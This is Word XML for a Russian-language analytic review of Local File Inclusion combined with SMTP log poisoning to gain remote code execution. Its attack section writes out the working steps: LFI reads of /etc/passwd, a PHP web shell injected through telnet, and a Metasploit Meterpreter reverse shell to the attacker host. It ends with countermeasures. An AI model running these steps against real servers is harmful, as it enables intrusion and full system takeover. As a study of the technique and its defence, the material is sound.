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b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Эксплуатация уязвимости локального включения файлов через отравление</w:t>
        <w:br/>
        <w:t>журналов SMTP для достижения удалённого выполнения кода</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Аналитический обзор техники атаки и мер противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Аннотация. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>В работе рассматривается составная атака на веб-инфраструктуру, объединяющая уязвимость локального включения файлов (Local File Inclusion, LFI) с механизмом журналирования почтовой службы SMTP. Показано, что внедрение интерпретируемого PHP-кода в журнал почтового сервера с последующим его включением через уязвимый параметр приложения приводит к удалённому выполнению произвольного кода (Remote Code Execution, RCE). Описана полная последовательность атаки, приведены использованные команды, проанализированы предпосылки успешной эксплуатации и предложен комплекс мер противодействия.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключевые слова: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>информационная безопасность; веб-уязвимости; Local File Inclusion; отравление журналов; SMTP; удалённое выполнение кода; PHP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>1. Введение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Современные веб-приложения нередко содержат уязвимости, которые по отдельности оцениваются как имеющие ограниченное воздействие, однако при совместном использовании образуют критическую цепочку эксплуатации. Классическим примером служит уязвимость локального включения файлов, традиционно трактуемая лишь как возможность чтения произвольных файлов. Настоящая работа демонстрирует, что в сочетании с особенностями журналирования почтовой службы SMTP указанная уязвимость позволяет достичь удалённого выполнения кода. Цель исследования — систематизировать последовательность атаки, выявить необходимые для её успеха условия и сформулировать эффективные меры защиты.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2. Предпосылки и используемые технологии</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Уязвимость LFI возникает, когда приложение подключает файл, путь к которому формируется из пользовательского ввода без надлежащей фильтрации. В экосистеме PHP это особенно опасно, поскольку подключаемое содержимое интерпретируется как исполняемый код. Служба SMTP, в свою очередь, фиксирует параметры почтовых транзакций в журнале (например, /var/log/mail.log), включая значения, передаваемые клиентом. Если такой журнал доступен для чтения через LFI и обрабатывается PHP-интерпретатором, возникает канал для внедрения и исполнения кода.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3. Модель угрозы и методология</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Рассматривается Linux-сервер (адрес 192.168.1.107), на котором функционируют уязвимое PHP-приложение и служба SMTP на порту 25. Со стороны исследователя применяются сканер Nmap, клиент Telnet и фреймворк Metasploit (адрес 192.168.1.109). Методология включает последовательные этапы: разведку, подтверждение LFI, внедрение полезной нагрузки в журнал, инициирование её исполнения и закрепление в виде интерактивной сессии.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4. Реализация атаки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Разведка. Подтверждается доступность почтовой службы:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nmap -p25 192.168.1.107</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Подтверждение LFI. Чтение системного файла и журнала почты доказывает наличие уязвимости и доступность целевого журнала:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.168.1.107/lfi/lfi.php?file=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.168.1.107/lfi/lfi.php?file=/var/log/mail.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.3. Отравление журнала. Посредством Telnet в поле адреса получателя внедряется PHP-инструкция, которая дословно фиксируется в журнале. Возвращаемая сервером ошибка «501 Bad recipient address syntax» не препятствует записи полезной нагрузки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>telnet 192.168.1.107 25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>MAIL FROM:&lt;attacker@example.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RCPT TO:&lt;?php system($_GET['c']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.4. Инициирование выполнения. Отравленный журнал включается через LFI, а команда передаётся в параметре c; PHP-интерпретатор исполняет внедрённый код, что подтверждается выводом команды ifconfig:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.168.1.107/lfi/lfi.php?file=/var/log/mail.log&amp;c=ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.5. Закрепление. Для перехода к интерактивной сессии используется модуль web_delivery:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>use exploit/multi/script/web_delivery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set target 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set payload php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set lhost 192.168.1.109</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set lport 8888</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Сгенерированная нагрузка передаётся через параметр c, после чего устанавливается сессия:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sessions 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Результатом является установленная сессия Meterpreter с полным доступом к системе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5. Обсуждение результатов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Проведённый анализ показывает, что критическое воздействие достигается не за счёт единичной уязвимости, а благодаря совмещению двух факторов: отсутствия фильтрации параметра включения файлов и доверчивого журналирования пользовательского ввода почтовой службой. Необходимыми условиями успеха являются интерпретация включаемого содержимого как PHP-кода и доступность журнала на чтение через уязвимый параметр. Отсутствие любого из этих условий разрывает цепочку эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6. Меры противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>На основании выявленных предпосылок предлагается комплекс защитных мер: строгая валидация и применение белых списков для параметров включения файлов; запрет на интерпретацию журналов веб-сервером как исполняемого кода; размещение журналов вне корневого каталога веб-приложения с минимально необходимыми правами доступа; санитизация данных, записываемых сетевыми службами. Реализация хотя бы одной из этих мер делает рассмотренную атаку невозможной.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>7. Заключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В работе систематизирована техника отравления журналов SMTP через уязвимость локального включения файлов, приводящая к удалённому выполнению кода. Показано, что корректная оценка рисков должна учитывать не изолированные уязвимости, а их потенциальные сочетания. Предложенные меры противодействия позволяют гарантированно предотвратить реализацию атаки. Дальнейшие исследования целесообразно направить на автоматизированное выявление подобных цепочек в процессе анализа защищённости веб-приложений.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Список источников</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. OWASP Foundation. Testing for Local File Inclusion. OWASP Web Security Testing Guide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. OWASP Foundation. Log Injection. OWASP Community Pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. MITRE. CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. MITRE. CWE-117: Improper Output Neutralization for Logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. Rapid7. Metasploit Framework: exploit/multi/script/web_delivery module documentation.</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567"/>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